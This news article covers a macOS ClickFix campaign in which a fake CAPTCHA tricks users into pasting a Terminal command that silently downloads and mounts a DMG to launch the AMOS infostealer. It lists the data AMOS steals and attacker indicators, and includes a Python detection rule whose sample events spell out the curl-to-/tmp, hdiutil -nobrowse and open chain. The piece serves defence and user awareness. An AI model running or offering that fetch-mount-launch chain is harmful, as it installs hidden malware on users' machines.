
New ClickFix Attack Uses Terminal to Silently Mount DMGs and Deploy AMOS

bleepingcomputer.com · @creative_hawk · 1 hour ago · Cybersecurity · 3 comments

Palo Alto Networks Unit 42 uncovered a macOS ClickFix campaign that uses a single Terminal command to download, mount, and launch Atomic macOS Stealer without the user ever seeing a Finder window.

Tags: Palo Alto Networks, Unit 42, macOS, Atomic macOS Stealer, AMOS, ClickFix

A single Terminal command now suffices to download, mount, and launch a malicious DMG on macOS, all without the victim ever seeing a Finder icon. Palo Alto Networks Unit 42 uncovered this ClickFix campaign pushing Atomic macOS Stealer (AMOS), and the technique is a nasty step up from previous social engineering tricks.

Fake CAPTCHA Hides a Two-Line Payload

ClickFix attacks have been around for a while, but earlier versions required the user to manually open a downloaded DMG or double-click a script. This campaign collapses the entire infection chain into one step. The victim lands on a fake CAPTCHA page that instructs them to open Terminal and paste a command to "verify they are human". That command does three things: it downloads a malicious DMG from svs-verificationdate[.]beer using curl -fsSL, saves it to /tmp under a random filename, then runs hdiutil attach -nobrowse to mount the disk image without showing it in Finder or on the desktop. The script then searches up to three directory levels deep into the mounted volume for the first .app or .pkg bundle and launches it with open. Unit 42 observed the DMG named s.01M0td.dmg containing a self-signed application bundle, NNApp.app. That app is AMOS, a known infostealer that has been circulating since at least mid-2023.
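The three-stage chain above (curl into /tmp, hdiutil attach -nobrowse, open of a bundle from the mounted volume) is a usable detection sequence. The following is an added example, not code from Unit 42 or BleepingComputer: it runs over constructed process-execution events in a hypothetical "timestamp|session|command" export format and alerts only when all three stages occur in the same shell session within a chosen time window; the sample commands, session ids, paths and the example.invalid host are all made up for the demonstration.

```python
import re
from datetime import datetime

# Constructed sample events in a hypothetical "timestamp|session|command" export
# (not a real EDR format). Session s1 reproduces the chain Unit 42 describes.
SAMPLE_EVENTS = """\
2025-01-01T10:00:01|s1|curl -fsSL https://example.invalid/s.dmg -o /tmp/x7Qp.dmg
2025-01-01T10:00:03|s1|hdiutil attach -nobrowse /tmp/x7Qp.dmg
2025-01-01T10:00:04|s1|open /Volumes/Update/NNApp.app
2025-01-01T10:05:00|s2|hdiutil attach -nobrowse /Users/dev/build/app.dmg
2025-01-01T12:00:00|s4|curl -fsSL https://example.invalid/s.dmg -o /tmp/zz.dmg
2025-01-01T13:00:00|s4|hdiutil attach -nobrowse /tmp/zz.dmg
2025-01-01T13:00:01|s4|open /Volumes/Update/NNApp.app
"""

# The three stages, in order: curl writing a DMG into /tmp, a -nobrowse mount of
# that /tmp DMG, and open launching a bundle from a mounted volume.
STAGES = [
    ("download", re.compile(r"\bcurl\b.*\s/tmp/\S+\.dmg\b")),
    ("silent_mount", re.compile(r"\bhdiutil\s+attach\b.*-nobrowse.*\s/tmp/\S+\.dmg\b")),
    ("launch", re.compile(r"\bopen\b.*/Volumes/\S+\.(?:app|pkg)\b")),
]
WINDOW_SECONDS = 300  # chosen threshold: a pasted one-liner finishes within minutes

def parse_events(text):
    for line in text.strip().splitlines():
        ts, session, cmd = line.split("|", 2)
        yield datetime.fromisoformat(ts), session, cmd

def detect_clickfix_chain(text, window=WINDOW_SECONDS):
    """Return one alert per session that completes download -> silent mount -> launch."""
    progress = {}  # session -> (next stage index, chain start time, matched commands)
    alerts = []
    for ts, session, cmd in parse_events(text):
        idx, start, seen = progress.get(session, (0, None, []))
        name, pattern = STAGES[idx]
        if not pattern.search(cmd):
            continue
        if idx == 0:
            start = ts
        elif (ts - start).total_seconds() > window:
            progress[session] = (0, None, [])  # too slow for a pasted one-liner; reset
            continue
        seen = seen + [(name, cmd)]
        if idx + 1 == len(STAGES):
            alerts.append({"session": session, "started": start.isoformat(), "stages": seen})
            progress[session] = (0, None, [])
        else:
            progress[session] = (idx + 1, start, seen)
    return alerts
```

Session s2 (a developer mounting a DMG from a build directory) and s4 (stages an hour apart) produce no alert, so the rule keys on the full chain rather than on any single legitimate utility.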

AMOS Strips Browsers, Wallets, and Native macOS Vaults

AMOS targets eight Chromium-based browsers: Google Chrome, Microsoft Edge, Brave, Opera, Arc, Vivaldi, CocCoc, and Yandex. It steals cookies, login databases, autofill data, stored payment cards, and browser profiles. For Firefox-derived browsers (LibreWolf, SeaMonkey, Tor Browser, Waterfox, Zen Browser) it grabs the same categories. The malware also scrapes Safari cookies and Apple Keychain database files.

Cryptocurrency wallet support is extensive: Exodus, Electrum, Atomic Wallet, Wasabi Wallet, Bitcoin Core, Litecoin Core, DashCore, Guarda, Binance Wallet, Dogecoin Wallet, and TonKeeper. Worse, AMOS replaces legitimate installations of Ledger Live and Trezor Suite with malicious versions, likely to intercept crypto transactions.

Telegram Desktop and Discord data are fair game. Apple Notes databases are exfiltrated. User documents with PDF, TXT, or RTF extensions are harvested. All stolen data gets packed into a ZIP archive and uploaded to the attacker-controlled server at 196.251.107[.]171.

One particularly insidious detail: AMOS displays a fake System Preferences authentication prompt to trick users into typing their macOS password. That password gives the malware access to the Keychain and other protected stores.

The Real Problem Is Trusting Terminal Commands

The attack succeeds because users are conditioned to trust official-looking dialogs. No browser exploit, no zero-day - just a social engineering prompt that feels routine. The command itself uses standard macOS utilities (curl, hdiutil, open) that any sysadmin would recognize. There is nothing in the syntax that screams "malware" to a non-technical user.

If you ever see a website telling you to open Terminal and paste a command, do not do it. Even CAPTCHA pages that look legitimate can hide this kind of payload. Understand every flag in a command before running it: with -nobrowse (no Finder or desktop icon for the mounted image) and -fsSL (silent curl that follows redirects and fails quietly on errors), the attacker ensured the infection stays invisible to casual inspection.

This technique will almost certainly be adopted by other threat actors because it requires minimal changes to existing ClickFix templates and works on any macOS version that ships with hdiutil. Expect more campaigns leveraging silent DMG mounting as the default delivery vector for macOS infostealers.


Source: New macOS ClickFix attack silently mounts DMGs to push infostealer
Domain: bleepingcomputer.com
